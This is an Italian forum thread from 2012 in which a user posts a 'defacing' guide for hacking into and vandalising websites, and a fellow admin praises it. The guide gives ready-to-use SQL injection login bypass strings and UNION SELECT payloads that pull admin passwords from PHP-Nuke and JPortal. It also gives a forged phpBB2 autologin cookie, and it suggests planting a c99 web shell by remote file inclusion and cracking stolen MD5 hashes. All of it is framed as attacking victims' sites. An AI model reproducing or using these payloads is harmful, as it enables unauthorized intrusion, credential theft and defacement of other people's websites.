Mondo Dei Computer
Bentornato nel nostro Forum Smile


P.S la attivazzioni dell'utente sono automatiche

Mondo Dei Computer

Vi diamo Dei Programmi per cazzeggiare e Utili Per Il Vostro Pc.(vi diamo aiuto su quello che volete)
IndiceCalendarioFAQCercaLista UtentiGruppiRegistratiAccediTeam Forum

Condividi | 
 

 Significato e guida Defacing

Andare in basso 
AutoreMessaggio
Own3D
Admin
Admin
avatar

Messaggi : 14
Data d'iscrizione : 01.08.12
Età : 23
Località : Piemonte

MessaggioTitolo: Significato e guida Defacing   Gio Ago 02, 2012 1:58 pm

termine Defacing vuol dire hackerare un sito, cioè cambiare l’Home Page o più pagine infatti bisogna distinguere due tipi di Deface:

* Deface: Deface normale con il solo cambio di index (Pagina iniziale)
* Mass Deface: Cancellazione o Modificazione di tutti i file dell’FTP

Ci sono varie tecniche per il Defacing, noi ne esamineremo 8: Remote File Inclusion, SQL Injection, ASP Injection, XSS (Cross Site Scripting), Remote Command Injection, Cookie Manipulation, Google Hacking e gli Exploit.

In questa guida parleremo di questi attacchi per 10 tipi di Siti:

1. PHP Site
2. PHP-Nuke Site
3. ASP Site
4. HTML Site
5. PHPBB
6. PHPBB2 Forum
7. JPortal
8. GuestBook
9. Invision PowerBoard
10. Powered by FrontPage

Ma ecco in dettaglio le varie mini-guide:

* PHP Site

Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere: [Solo gli amministratori hanno il permesso di visualizzare questo link]
[Solo gli amministratori hanno il permesso di visualizzare questo link] (tutto attaccato).
Dove al posto di [Solo gli amministratori hanno il permesso di visualizzare questo link] ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’[Solo gli amministratori hanno il permesso di visualizzare questo link]

Oppure si può usare la tecnica SQL Injection, scrivendo nel login:

UserName: ‘or’’=’
Password: ‘or’’=’

Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password: [Solo gli amministratori hanno il permesso di visualizzare questo link]

Se vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo: [Solo gli amministratori hanno il permesso di visualizzare questo link]
/passwd (tutto attaccato)
Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso [Solo gli amministratori hanno il permesso di visualizzare questo link]
/passwd (tutto attaccato)
Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò .

* PHP-Nuke Site

Ora vi illustro 3 exploit moderni e funzionanti;

Exploit – Modulo Cerca

Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.

Exploit – Top10

Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit: [Solo gli amministratori hanno il permesso di visualizzare questo link]
%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.

Exploit – Sql Injection

Scriviamo nella barra degli indirizzi la stringa: [Solo gli amministratori hanno il permesso di visualizzare questo link]
Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.

Con la stringa [Solo gli amministratori hanno il permesso di visualizzare questo link] si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass

* ASP Site

In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root

Diventare Utenti senza Neanche registrarsi:

UserName: apostrofo
Password: [nessuna password, lasciate vuoto]

Accedere da Admin:

UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]

Diventare automaticamente amministratori

UserName: admin’ –
Password: [nessuna pass]

Primo utente nella lista

UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]

* HTML Site

L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi.
L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS.

* PHPBB & PHPBB2 Forum

Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima).

Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%*7B%*7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%*7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%*7D (tutto attaccato).
Salvate tutto e torniamo al forum. Adesso saremo admin.
PS: Smanettando un pò con i cookie potete accedere in Root in molti siti.

* JPortal

Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login:

[Solo gli amministratori hanno il permesso di visualizzare questo link]
0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,i d%20
from%20admins%20LIMIT%201 (tutto attaccato)

FONTE:Mia e postata fa me in altri forum Very Happy


Ciao bounce bounce
Torna in alto Andare in basso
Visualizza il profilo
jakass
Admin
Admin
avatar

Messaggi : 26
Data d'iscrizione : 25.07.12

MessaggioTitolo: Re: Significato e guida Defacing   Gio Ago 02, 2012 7:28 pm

Bravo Own3D,Bella Guida , continua così e potrsti andae avanti di grado Smile

La propria Firma
Fondatore Forum
Torna in alto Andare in basso
Visualizza il profilo http://moncodeicomputer.italiaforum.net
Own3D
Admin
Admin
avatar

Messaggi : 14
Data d'iscrizione : 01.08.12
Età : 23
Località : Piemonte

MessaggioTitolo: Re: Significato e guida Defacing   Gio Ago 02, 2012 7:29 pm

Grazie What a Face
Torna in alto Andare in basso
Visualizza il profilo
Contenuto sponsorizzato




MessaggioTitolo: Re: Significato e guida Defacing   

Torna in alto Andare in basso
 
Significato e guida Defacing
Torna in alto 
Pagina 1 di 1
 Argomenti simili
-
» Nuove linee guida del SSN per amniocentesi e villocentesi
» significato dei nomi
» GUIDA COMPILAZIONE SCHEDA PER L'INDIVIDUAZIONE DEI SOPRANNUMERARI?
» Significato "non abilitati"...
» guida alla compilazione modello A3

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
Mondo Dei Computer :: Computer :: Hacking-
Vai verso: